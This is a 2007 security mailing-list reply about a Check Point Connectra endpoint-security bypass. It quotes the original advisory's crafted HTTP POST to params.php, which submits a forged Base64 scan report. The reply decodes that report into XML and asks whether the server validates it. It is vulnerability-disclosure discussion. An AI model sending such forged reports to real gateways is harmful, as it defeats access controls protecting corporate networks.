Re: [Full-disclosure] Check Point Connectra End Point security bypass

To: "Roni Bachar" <roni@xxxxxxxxxxx>
Subject: Re: [Full-disclosure] Check Point Connectra End Point security bypass
From: Felix Lindner <fx@xxxxxxxxxxxxxx>
Date: Mon, 22 Jan 2007 14:19:51 +0100
Cc: websecurity@xxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx
In-reply-to: <000601c73de7$69f82bc0$d87b6c54@mn9tmjs2rb4p9pl>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: SABRE Labs
References: <000601c73de7$69f82bc0$d87b6c54@mn9tmjs2rb4p9pl>

Hi,

On Mon, 22 Jan 2007 07:37:29 +0200
"Roni Bachar" <roni@xxxxxxxxxxx> wrote:
> The vulnerability can be exploited by doing the following stages:
> 
> Sending a post request as followed:
> 
> POST https://serverip/sre/params.php HTTP/1.1
> Content-Type: application/x-www-form-urlencoded
> User-Agent: ICS_Secure 
> Host: serverip
> Content-Length: 251
> Cache-Control: no-cache
> Cookie: ICS_Test_Cookie=1
>       
> Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
> TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
> WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
> 1NyZVNjYW5SZXBvcnQ+Cg==

I assume you meant saying that the Base64 encoded Data in the Report variable
must be adjusted to reflect the actual hostname etc., or is params.php
accepting _any_ report that looks reasonably valid?

For reference, the decoded data in this example is:
<?xml version="1.0"?>

<SreScanReport Version="3.7.116.0">
        <UserInfo WinDomain="" WinUser="roni" WinUserCatalog="C:\Documents and
Settings\roni.LENOVO-4FFEF4E3"/> 
</SreScanReport>

cheers
FX

-- 
SABRE Labs GmbH            | Felix 'FX' Lindner <fx@xxxxxxxxxxxxxx> 
http://www.sabre-labs.com  | GSM: +49 171 7402062
Wrangelstrasse 4           | PGP: A740 DE51 9891 19DF 0D05  
10997 Berlin, Germany      |      13B3 1759 C388 C92D 6BBB

References:
- Check Point Connectra End Point security bypass
  - From: Roni Bachar

Prev by Date: Wiki-how path disclosure
Next by Date: Re: SMF "index.php?action=pm" Cross Site-Scripting
Previous by thread: Check Point Connectra End Point security bypass
Next by thread: [x0n3-h4ck] bitweaver 1.3.1 XSS Exploit
Index(es):
- Date
- Thread